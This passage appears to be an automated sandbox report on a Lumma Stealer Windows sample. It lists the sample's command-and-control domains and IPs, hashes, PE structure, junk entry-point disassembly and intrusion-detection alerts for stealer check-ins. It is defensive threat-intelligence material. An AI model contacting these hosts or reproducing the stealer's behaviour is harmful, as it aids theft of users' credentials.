                                                                                                                                                                                                                                http://x1.c.lencr.org/0LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  http://x1.i.lencr.org/0LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallLNn56KMkEE.exe, 00000000.00000003.1776244890.00000000058BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aLNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://lev-tolstoi.com/apiD;LNn56KMkEE.exe, 00000000.00000002.1931358953.0000000005880000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                              104.21.66.86
                                                                                                                                                                                                                                              lev-tolstoi.comUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              104.102.49.254
                                                                                                                                                                                                                                              steamcommunity.comUnited States
                                                                                                                                                                                                                                              16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                              Analysis ID:1579784
                                                                                                                                                                                                                                              Start date and time:2024-12-23 09:05:43 +01:00
                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                              Overall analysis duration:0h 4m 35s
                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                              Number of analysed new started processes analysed:4
                                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                              Sample name:LNn56KMkEE.exe
                                                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                                                              Original Sample Name:5f8d5c992633d84420477157cb75f8ae.exe
                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                                              EGA Information:Failed
                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                                                                                                              • Number of non-executed functions: 1
                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                                              • Stop behavior analysis, all processes terminated
                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                              • Execution Graph export aborted for target LNn56KMkEE.exe, PID 6948 because there are no executed function
                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                                              03:06:35API Interceptor13x Sleep call for process: LNn56KMkEE.exe modified
                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                                              104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                              • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                                              http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              lev-tolstoi.comBVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                              jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                              pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                              xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                              5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              s31ydU1MpQ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              steamcommunity.comYYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              VBHyEN96Pw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              613vKYuY2S.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              44EPDJT1V8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              AKAMAI-ASUSYYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              VBHyEN96Pw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              613vKYuY2S.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              44EPDJT1V8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 23.222.144.153
                                                                                                                                                                                                                                              CLOUDFLARENETUSBVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                              • 104.21.32.96
                                                                                                                                                                                                                                              mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                              nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                              jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              QQ5BxgG5G6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.32.96
                                                                                                                                                                                                                                              FjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                                                                                              mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1VBHyEN96Pw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              613vKYuY2S.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              44EPDJT1V8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              QQ5BxgG5G6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                              No created / dropped files found
                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):7.948738290319071
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                              File name:LNn56KMkEE.exe
                                                                                                                                                                                                                                              File size:1'866'752 bytes
                                                                                                                                                                                                                                              MD5:5f8d5c992633d84420477157cb75f8ae
                                                                                                                                                                                                                                              SHA1:96e3391bb7d724dc2473e9683d5c4d8b127838b8
                                                                                                                                                                                                                                              SHA256:417c9ef01a8077d082b1b053311d219902988c959cc91ccffa262bff29fe8cbb
                                                                                                                                                                                                                                              SHA512:27b58d86c104c532ec5ccf6ddd2089a5eaedf6a5c86d0325efc9544fdd6f598b6452b947ba3081878d886d9288649def9f35ae49243ebc3d78bfbb6ccda84d1c
                                                                                                                                                                                                                                              SSDEEP:49152:TkpZ4wqdmt2o6XYHPOIqefFrjfqO/53INx:TkpZ4jmwo6o/rFHi+M
                                                                                                                                                                                                                                              TLSH:3F8533148DAF353FF649EB356BA1440A399D8488334AEED52F31C4AAD281E3D4449DFE
                                                                                                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................J...........@..........................@J.....7.....@.................................T0..h..
                                                                                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                              Entrypoint:0x8a1000
                                                                                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              jmp 00007F2ADCF434BAh
                                                                                                                                                                                                                                              cvtps2pd xmm3, qword ptr [eax+eax]
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              jmp 00007F2ADCF454B5h
                                                                                                                                                                                                                                              add byte ptr [edx], ah
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [edi], al
                                                                                                                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                                                                                                                              add byte ptr [0200000Ah], al
                                                                                                                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [ecx], al
                                                                                                                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], cl
                                                                                                                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add eax, 0000000Ah
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], dl
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [edx], al
                                                                                                                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x1ac.rsrc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                              0x10000x510000x24800f2bc9cda856d92e440852f54f7dc1256False0.9973646190068494data7.979452992812568IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              .rsrc0x520000x1ac0x20075720b8ea60aa06a31806981b744f74eFalse0.5390625data5.245569576626531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              0x540000x2ac0000x200b4e2ecd9fb9893d34c3283cb63cf58f8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              srolqark0x3000000x1a00000x19f60015c4b2457a6ee9f9527811b39b6ea1e5False0.9948659202904002data7.954307245749782IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              yixtsbvq0x4a00000x10000x6006f3b766087fb66517636e16ff1e7db89False0.5813802083333334data4.998219211278565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              .taggant0x4a10000x30000x2200f038de58a0779cf181581da23bcb6503False0.06399356617647059DOS executable (COM)0.8270228919795393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                              RT_MANIFEST0x520580x152ASCII text, with CRLF line terminators0.6479289940828402
                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                              kernel32.dlllstrcpy
                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                              2024-12-23T09:06:36.516878+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.4539141.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-23T09:06:36.672146+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.4603941.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-23T09:06:36.812543+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.4626591.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-23T09:06:36.955604+01002058370ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)1192.168.2.4563901.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-23T09:06:37.105933+01002058362ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)1192.168.2.4502141.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-23T09:06:37.263224+01002058354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)1192.168.2.4547791.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-23T09:06:37.470705+01002058376ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)1192.168.2.4628691.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-23T09:06:37.668445+01002058358ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)1192.168.2.4528461.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-23T09:06:37.810524+01002058374ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)1192.168.2.4574911.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-23T09:06:39.564438+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.102.49.254443TCP
                                                                                                                                                                                                                                              2024-12-23T09:06:40.318447+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.449730104.102.49.254443TCP
                                                                                                                                                                                                                                              2024-12-23T09:06:41.908306+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-23T09:06:42.631868+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-23T09:06:42.631868+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.66.86443TCP
